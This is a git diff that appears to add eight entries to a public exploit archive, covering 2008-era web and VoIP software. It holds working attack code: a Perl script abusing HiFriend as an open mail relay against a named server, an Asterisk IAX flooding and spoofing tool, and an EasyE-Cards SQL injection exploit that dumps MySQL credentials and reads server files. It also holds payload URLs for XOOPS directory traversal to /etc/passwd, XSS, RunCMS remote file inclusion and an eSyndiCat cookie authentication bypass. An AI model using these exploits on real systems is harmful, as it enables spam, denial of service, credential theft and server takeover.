diff --git a/files.csv b/files.csv
index 7d8726e64..3f7eeccd5 100755
--- a/files.csv
+++ b/files.csv
@@ -28872,3 +28872,11 @@ id,file,description,date,author,platform,type,port
32091,platforms/php/webapps/32091.txt,"MyBlog 0.9.8 Multiple Remote Information Disclosure Vulnerabilities",2008-07-21,"AmnPardaz Security Research Team",php,webapps,0
32092,platforms/php/webapps/32092.txt,"Flip 3.0 'config.php' Remote File Include Vulnerability",2008-07-21,Cru3l.b0y,php,webapps,0
32093,platforms/php/webapps/32093.txt,"phpKF 'forum_duzen.php' SQL Injection Vulnerability",2008-07-21,U238,php,webapps,0
+32094,platforms/cgi/webapps/32094.pl,"HiFriend 'cgi-bin/hifriend.pl' Open Email Relay Vulnerability",2008-07-21,Perforin,cgi,webapps,0
+32095,platforms/linux/dos/32095.pl,"Asterisk <= 1.6 IAX 'POKE' Requests Remote Denial of Service Vulnerability",2008-07-21,"Blake Cornell",linux,dos,0
+32096,platforms/php/webapps/32096.pl,"EasyE-Cards 3.10 SQL Injection Vulnerability and Multiple Cross Site Scripting Vulnerabilities",2008-07-21,Dr.Crash,php,webapps,0
+32097,platforms/php/webapps/32097.txt,"Xoops 2.0.18 modules/system/admin.php fct Parameter Traversal Local File Inclusion",2008-07-21,Ciph3r,php,webapps,0
+32098,platforms/php/webapps/32098.txt,"Xoops 2.0.18 modules/system/admin.php fct Parameter XSS",2008-07-21,Ciph3r,php,webapps,0
+32099,platforms/php/webapps/32099.txt,"RunCMS 1.6.1 votepolls.php bbPath[path] Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0
+32100,platforms/php/webapps/32100.txt,"RunCMS 1.6.1 config.php bbPath[root_theme] Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0
+32101,platforms/php/webapps/32101.txt,"eSyndiCat 1.6 'admin_lng' Cookie Parameter Authentication Bypass Vulnerability",2008-07-21,Ciph3r,php,webapps,0
diff --git a/platforms/cgi/webapps/32094.pl b/platforms/cgi/webapps/32094.pl
new file mode 100755
index 000000000..5fc6964d4
--- /dev/null
+++ b/platforms/cgi/webapps/32094.pl
@@ -0,0 +1,85 @@
+source: http://www.securityfocus.com/bid/30320/info
+
+HiFriend is prone to an open-email-relay vulnerability.
+
+An attacker could exploit this issue by constructing a script that would send unsolicited bulk email to an unrestricted amount of email addresses with a forged email address.
+
+#!/usr/bin/perl
+=pod
+----------------------------
+------Header Injection------
+----------------------------
+
+Script: hifriend.pl
+Vendor: Hibyte Software
+Version: The free one you get from many webpages
+Dork: "hifriend.pl" + "cgi-bin"
+
+Found & coded by Perforin
+
+www.DarK-CodeZ.com
+www.vx.perforin.de.vu
+
+
+Greetz to: SkyOut,Sph1nX,zer0day,Rayden,Neo2k8,Cactus,MereX and all my Friends out there!
+=cut
+
+use strict;
+use warnings;
+use IO::Socket::INET;
+
+
+my($MSG,$lngt,$data,$sock,$add,%config);
+
+# Here%GŽ%@s your Message
+
+$MSG = <<"TXT";
+arf arf arf
+We gotcha!
+
+Visit http://DarK-CodeZ.com
+
+German VX Community
+
+TXT
+
+# No im not making a friendly Code where you just have to start and type your shit in.
+# Use brain.exe to fill in the stuff you need.
+
+%config = (
+Server => "sweetscents.com",
+Path => "/cgi-bin/",
+From => "admin".chr(64)."freehostia.com",
+To => "Luxpower".chr(64)."web.de",
+Name => "Perforin",
+MSG => "$MSG"
+);
+
+
+$sock = new IO::Socket::INET(PeerAddr => $config{'Server'},
+ PeerPort => 80,
+ Proto => 'tcp',
+ Timeout => 1) || die("[+] Could not connect!\n");
+
+
+$data = 'refpage=&reftitle=&Friends='.$config{'To'}.'&SenderName='.$config{'Name'}.'&From='.$config{'From'}.'&PersonalMsg='.$config{'MSG'};
+
+$lngt = length($data);
+
+print $sock "POST $config{'Path'}hifriend.pl?sp=y HTTP/1.1\n";
+print $sock "Host: $config{'Server'}\n";
+print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12\n";
+print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
+print $sock "Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\n";
+print $sock "Accept-Encoding: gzip,deflate\n";
+print $sock "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n";
+print $sock "Keep-Alive: 300\n";
+print $sock "Connection: keep-alive\n";
+print $sock "Referer: $config{'Server'}/cgi-bin/hifriend.pl\n";
+print $sock "Accept-Language: en-us\n";
+print $sock "Content-Type: application/x-www-form-urlencoded\n";
+print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7. Gecko/20070421 Firefox/2.0.0\n";
+print $sock "Content-Length: $lngt\n\n";
+print $sock "$data\n";
+
+print "[+] Done!";
diff --git a/platforms/linux/dos/32095.pl b/platforms/linux/dos/32095.pl
new file mode 100755
index 000000000..e08ac53a4
--- /dev/null
+++ b/platforms/linux/dos/32095.pl
@@ -0,0 +1,260 @@
+source: http://www.securityfocus.com/bid/30321/info
+
+Asterisk is prone to a remote denial-of-service vulnerability because it fails to handle multiple 'POKE' requests in quick succession.
+
+Attackers can exploit this issue by sending a persistent stream of 'POKE' requests that will consume processor resources and deny service to legitimate users.
+
+NOTE: By default, 'POKE' requests are not logged by Asterisk.
+
+#!/usr/bin/perl -w
+#udp IAX ping discovery and injection tool
+#Created: Blake Cornell
+#Released under no license, use at your own free will
+#
+# Do not hesitate to show enthusiasm and support
+# and help develop this further.
+
+use strict;
+use IO::Socket;
+use Getopt::Long;
+use Net::Subnets;
+use Pod::Usage;
+
+
+my @target_port = (4569);
+my @targets = ('127.0.0.1');
+
+my $result = GetOptions('port|p=i' => \(my $port = ''),
+ 'sport|sp=i' => \(my $sport = ''),
+ 'eport|ep=i' => \(my $eport = ''),
+ 'source|sip=s' => \(my $source = ''),
+ 'host|h=s' => \(my $host = ''),
+ 'inject|in' => \(my $inject = ''),
+ 'dos' => \(my $dos = ''),
+ 'timeout|t=i' => \(my $timeout = ''),
+ 'dundi-check|dundi' => \(my $dundi = ''),
+ 'verbose|v' => \(my $verbose = ''),
+ 'help|?' => \(my $help = '')) or pod2usage(2);
+
+if($help) { printUsage(); }
+if($host) { @targets=@{retHosts($host)}; }
+if($port) { $target_port[0] = $port; }
+if($dundi) { print "DUNDI Option Scan not supported yet."; }
+if($source) { print "Setting of the source IP address is only supported
+in inject mode"; }
+
+
+if($inject) {
+ if($verbose) { print "INJECTION MODE"; }
+ if(!@targets) {
+ print "\nSet the host ( -h ) option\n";
+ return 1;
+ }
+ for(my $i=20000;$i<=65535;$i++) {
+ for(my $j=0;$j<=$#targets;$j++) {
+ if($verbose) { print $targets[$j]; }
+ injectIAXPoke($targets[$j],$source,$i,0);
+ }
+ #my($target,$source,$port,$timeout,@args)=@_;
+ }
+ exit;
+}
+
+if($dos) {
+ while(1) {
+ for(my $j=0;$j<=$#targets;$j++) {
+ if($verbose) { print $targets[$j]; }
+ dosIAXPoke($targets[$j],4569,$timeout);
+ }
+
+ }
+}
+
+if($sport ne '' && $eport ne '') { #defined doesn't work for getoptions
+ #devices are always defined
+ if($verbose ne '') { print "Scanning Port Range\n"; }
+ if($eport < $sport) {
+ my $tmp = $eport;
+ $eport = $sport;
+ $sport = $tmp;
+ }
+ if($sport < 1) { $sport = 1; }
+ if($eport > 65535) { $eport = 65535; }
+ if($timeout ne '' && $verbose ne '') {
+ if($timeout <= 0) {
+ $timeout = 1;
+ }
+ print "Scanning Ports $sport through $eport\n";
+ print "Setting timeout to $timeout\n";
+ }
+
+ @target_port=();
+ for(my $i=$sport; $i <= $eport; $i++) {
+ push(@target_port,$i);
+ }
+ sendIAXPokes(\@targets,\@target_port);
+
+}else{ #scanning only default port...
+ sendIAXPokes(\@targets,\@target_port);
+}
+
+sub sendIAXPokes {
+ my($targets_ref,$target_ports_ref,@args)=@_;
+
+ my @targets=@{$targets_ref};
+ my @target_ports=@{$target_ports_ref};
+
+ for(my $i=0;$i<=$#targets;$i++) {
+ for(my $j=0;$j<=$#target_ports;$j++) {
+
+sendIAXPoke($targets[$i],$target_ports[$j],$timeout);
+ }
+ }
+}
+
+sub sendIAXPoke {
+ my($target,$port,$timeout,@args)=@_;
+
+ if($verbose) {
+ print "Trying $target:$port\n";
+
+ }
+ socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));
+
+ my $src_call = "8000";
+ my $dst_call = "0000";
+ my $timestamp = "00000000";
+ my $outbound_seq = "00";
+ my $inbound_seq = "00";
+ my $type = "06"; #IAX_Control
+ my $iax_type = "1e"; #POKE
+ my $msg = pack "H24", $src_call . $dst_call . $timestamp .
+$outbound_seq . $inbound_seq . $type . $iax_type;
+
+ my $ipaddr = inet_aton($target);
+ my $sin = sockaddr_in($port,$ipaddr);
+
+ send(PING, $msg, 0, $sin) == length($msg) or die "cannot send to
+$target : $port : $!\n";
+
+ my $MAXLEN = 1024;
+ my $TIMEOUT = 1;
+ if(defined($timeout) && $timeout ne '' && $timeout != 0) {
+#timeout of 0 hangs
+
+#unanswered requests
+ $TIMEOUT=$timeout;
+ }
+ eval {
+ local $SIG{ALRM} = sub { die "alarm time out"; };
+ alarm $TIMEOUT;
+
+ while (1) {
+ my $recvfrom = recv(PING, $msg, $MAXLEN, 0) or
+die "recv: $!";
+ ($port, $ipaddr) = sockaddr_in($recvfrom);
+ my $respaddr = inet_ntoa($ipaddr);
+ print "Response from $respaddr : $port\n";
+ return($respaddr,$port);
+ }
+
+ };
+}
+
+sub injectIAXPoke {
+ my($target,$source,$port,$timeout,@args)=@_;
+
+ socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));
+
+ my $src_call = "8000";
+ my $dst_call = "0000";
+ my $timestamp = "00000000";
+ my $outbound_seq = "00";
+ my $inbound_seq = "01"; #increment by one did he say?
+ my $type = "06"; #IAX_Control
+ my $iax_type = "03"; #PONG
+ my $msg = pack "H24", $src_call . $dst_call . $timestamp .
+$outbound_seq . $inbound_seq . $type . $iax_type;
+
+ my $targetIP = inet_aton($target);
+ my $sin = sockaddr_in($port,$targetIP);
+
+ send(PING, $msg, 0, $sin) == length($msg) or die "cannot send to
+$target : $port : $!\n";
+}
+
+sub retHosts {
+ my($host,@args)=@_;
+ my @addrs;
+
+ if(!$host) { return ('127.0.0.1') };
+
+ if($host =~
+/^([\d]{1,3}).([\d]{1,3}).([\d]{1,3}).([\d]{1,3})\/([\d]{1,2})$/ && $1
+>= 0 && $1 <= 255 && $2 >= 0 && $2 <= 255 && $3 >= 0 && $3 <= 255 && $4
+>= 0 && $4 <= 255) {
+ #Check to see if host is valid
+class C CIDR Address
+ if($verbose) { print "Setting CIDR Address Range\n"; }
+ my $sn = Net::Subnets->new;
+
+ my($low,$high)=$sn->range(\$host);
+ if($verbose) { print "Determined IP Ranges From $$low -
+$$high\n"; }
+ return \@{ $sn->list(\($$low,$$high)) };
+
+ }elsif($host =~
+/^([\d]{1,3}).([\d]{1,3}).([\d]{1,3}).([\d]{1,3})$/ && $1 >= 0 && $1 <=
+255 && $2 >= 0 && $2 <= 255 && $3 >= 0 && $3 <= 255 && $4 >= 0 && $4 <=
+255) {
+ #Check to see if host is valid
+IP
+ push(@addrs,"$1.$2.$3.$4");
+ }else{
+ push(@addrs,$host);
+ }
+ return \@addrs;
+}
+
+sub dosIAXPoke {
+ my($target,$port,$timeout,@args)=@_;
+
+ if($verbose) {
+ print "Trying $target:$port\n";
+
+ }
+ socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));
+
+ my $src_call = "8000";
+ my $dst_call = "0000";
+ my $timestamp = "00000000";
+ my $outbound_seq = "00";
+ my $inbound_seq = "00";
+ my $type = "06"; #IAX_Control
+ my $iax_type = "1e"; #POKE
+ my $msg = pack "H24", $src_call . $dst_call . $timestamp .
+$outbound_seq . $inbound_seq . $type . $iax_type;
+
+ my $ipaddr = inet_aton($target);
+ my $sin = sockaddr_in($port,$ipaddr);
+
+ send(PING, $msg, 0, $sin) == length($msg) or die "cannot send to
+$target : $port : $!\n";
+}
+
+
+sub printUsage {
+ print "$0 -h remoteorigin.com \n\t\tScans remoteorigin.com on
+default port of 4569\n";
+ print "$0 -h remoteorigin.com -sp 4000 -ep 5000\n\t\tScans ports
+4000 through 5000 on server remoteorigin.com\n";
+ print "$0 --source remoteorigi.com -h 127.0.0.1
+--inject\n\t\tInjects Forged Poke Replies to 127.0.0.1 from
+remoteorigin.com\n";
+ print "$0 --dos\n\t\tThis will continually send IAX Poke
+packets. This will eat up CPU cycles and isn't logged by default\n";
+ exit;
+}
+
+
+
diff --git a/platforms/php/webapps/32096.pl b/platforms/php/webapps/32096.pl
new file mode 100755
index 000000000..1d3fec6e7
--- /dev/null
+++ b/platforms/php/webapps/32096.pl
@@ -0,0 +1,206 @@
+source: http://www.securityfocus.com/bid/30328/info
+
+EasyE-Cards is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and multiple cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+EasyE-Cards 3.10a is vulnerable; other versions may also be affected.
+
+
+#!/usr/bin/perl
+#----------------------------------------------------------------
+#
+#Script : Easyecards 310a
+#
+#Type : Multipe Vulerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit )
+#
+#Variable Method : GET
+#
+#Alert : High
+#
+#----------------------------------------------------------------
+#
+#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
+#
+#My Offical Website : HTTP://FEREIDANI.IR
+#
+#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
+#
+#----------------------------------------------------------------
+#
+#Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR
+#
+#----------------------------------------------------------------
+#
+#Script Download : http://myiosoft.com/download/EasyE-Cards/easyecards-310a.zip
+#
+#----------------------------------------------------------------
+#Xss 1 : http://www.example.com/?ResultHtml=
+#
+#Xss 2 : http://www.example.com/index.php?step=2&dir=<>>>>''"
+#
+#Xss 3 : http://www.example.com/index.php?step=2&SenderName=<>>>>''"
+#
+#Xss 4 : http://www.example.com/index.php?step=2&RecipientName=%3C%3E%3E%3E%3E%27%27%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E
+#
+#Xss 5 : http://www.example.com/index.php?step=2&SenderMail=<>>>>''"
+#
+#Xss 6 : http://www.example.com/index.php?step=2&RecipientMail=%3C%3E%3E%3E%3E%27%27%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E
+#
+#----------------------------------------------------------------
+#
+#SQL Injection :
+#
+#SQL 1 : http://www.example.com/index.php?show=pickup&sid=99999'+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13/*
+#
+#
+#----------------------------------------------------------------
+#
+# Tnx : God
+#
+# HTTP://IRCRASH.COM
+#
+#----------------------------------------------------------------
+
+
+use LWP;
+use HTTP::Request;
+use Getopt::Long;
+sub header
+{
+print "
+****************************************************
+* Easyecards 310a Exploit *
+****************************************************
+*Discovered by : Khashayar Fereidani *
+*Exploited by : Khashayar Fereidani *
+*My Official Website : http://fereidani.ir *
+****************************************************";
+}
+
+sub usage
+{
+ print "
+* Usage : perl $0 http://Example/
+****************************************************
+";
+}
+
+
+$url = ($ARGV[0]);
+
+if(!$url)
+{
+header();
+usage();
+exit;
+}
+if($url !~ /\//){$url = $url."/";}
+if($url !~ /http:\/\//){$url = "http://".$url;}
+sub xpl1()
+{
+$vul =
+"?show=pickup&sid=99999'+union+select+0,concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),2,3,4,5,6
+,7,8,9,10,11,12,13+from+mysql.user/*";
+$requestpage = $url.$vul;
+my $req = HTTP::Request->new("POST",$requestpage);
+$ua = LWP::UserAgent->new;
+$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
+#$req->referer($url);
+$req->referer("IRCRASH.COM");
+$req->content_type('application/x-www-form-urlencoded');
+$req->header("content-length" => $contlen);
+$req->content($poststring);
+
+$response = $ua->request($req);
+$content = $response->content;
+$header = $response->headers_as_string();
+
+@name = split(/Login:/,$content);
+$name = @name[1];
+@name = split(//,$name);
+$name = @name[0];
+
+@password = split(/Password:/,$content);
+$password = @password[1];
+@password = split(//,$password);
+$password = @password[0];
+
+if(!$name && !$password)
+{
+print "\n\n";
+print "!Exploit failed ! :(\n\n";
+exit;
+}
+
+print "\n Username: ".$name."\n\n";
+print " Password: " .$password."\n\n";
+
+
+}
+#XPL2
+
+sub xpl2()
+{
+print "\n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd";
+print "\n Enter File Address :";
+$fil3 = ;
+
+$vul =
+"?show=pickup&sid=99999'+union+select+0,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*";
+$requestpage = $url.$vul;
+
+my $req = HTTP::Request->new("POST",$requestpage);
+$ua = LWP::UserAgent->new;
+$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
+#$req->referer($url);
+$req->referer("IRCRASH.COM");
+$req->content_type('application/x-www-form-urlencoded');
+$req->header("content-length" => $contlen);
+$req->content($poststring);
+
+$response = $ua->request($req);
+$content = $response->content;
+$header = $response->headers_as_string();
+
+
+@name = split(/Login:/,$content);
+$name = @name[1];
+@name = split(//,$name);
+$name = @name[0];
+
+
+if(!$name && !$password)
+{
+print "\n\n";
+print "!Exploit failed ! :(\n\n";
+exit;
+}
+
+open (FILE, ">".source.".txt");
+print FILE $name;
+close (FILE);
+print " File Save In source.txt\n";
+print "";
+
+}
+
+#XPL2 END
+#Starting;
+print "
+****************************************************
+* Easyecards 310a Exploit *
+****************************************************
+*Discovered by : Khashayar Fereidani *
+*Exploited by : Khashayar Fereidani *
+*My Official Website : http://fereidani.ir *
+****************************************************
+* Mod Options : *
+* Mod 1 : Find mysql username and root password *
+* Mod 2 : Save PHP config source in your system *
+****************************************************";
+print "\n \n Enter Mod : ";
+$mod=;
+if ($mod=="1" or $mod=="2") { print "\n Exploiting .............. \n"; } else { print "\n Unknown Mod ! \n Exploit Failed !"; };
+if ($mod=="1") { xpl1(); };
+if ($mod=="2") { xpl2(); };
diff --git a/platforms/php/webapps/32097.txt b/platforms/php/webapps/32097.txt
new file mode 100755
index 000000000..0ed5e0e45
--- /dev/null
+++ b/platforms/php/webapps/32097.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/30330/info
+
+XOOPS is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit the local file-include vulnerability using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
+
+The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+XOOPS 2.0.18.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/scripts_path/modules/system/admin.php?fct=../../../../../../../../../../etc/passwd%00
diff --git a/platforms/php/webapps/32098.txt b/platforms/php/webapps/32098.txt
new file mode 100755
index 000000000..a1f656d2f
--- /dev/null
+++ b/platforms/php/webapps/32098.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/30330/info
+
+XOOPS is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit the local file-include vulnerability using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
+
+The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+XOOPS 2.0.18.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/scripts_path/modules/system/admin.php?fct=">
\ No newline at end of file
diff --git a/platforms/php/webapps/32099.txt b/platforms/php/webapps/32099.txt
new file mode 100755
index 000000000..563c8a30d
--- /dev/null
+++ b/platforms/php/webapps/32099.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30331/info
+
+RunCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+RunCMS 1.6.1 is vulnerable; other versions may be affected as well.
+
+http://www.example.com/modules/newbb_plus/votepolls.php?bbPath[path]=http://www.example2.com
\ No newline at end of file
diff --git a/platforms/php/webapps/32100.txt b/platforms/php/webapps/32100.txt
new file mode 100755
index 000000000..b323e16d9
--- /dev/null
+++ b/platforms/php/webapps/32100.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30331/info
+
+RunCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+RunCMS 1.6.1 is vulnerable; other versions may be affected as well.
+
+http://www.example.com/modules/newbb_plus/config.php?bbPath[root_theme]=http://www.example2.com
\ No newline at end of file
diff --git a/platforms/php/webapps/32101.txt b/platforms/php/webapps/32101.txt
new file mode 100755
index 000000000..2ed68ade7
--- /dev/null
+++ b/platforms/php/webapps/32101.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30332/info
+
+eSyndiCat is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
+
+An attacker can exploit this vulnerability to gain administrative access to the affected application; other attacks are also possible.
+
+eSyndiCat 1.6 is vulnerable; other versions may also be affected.
+
+javascript:document.cookie = "admin_lng=1; path=/";
\ No newline at end of file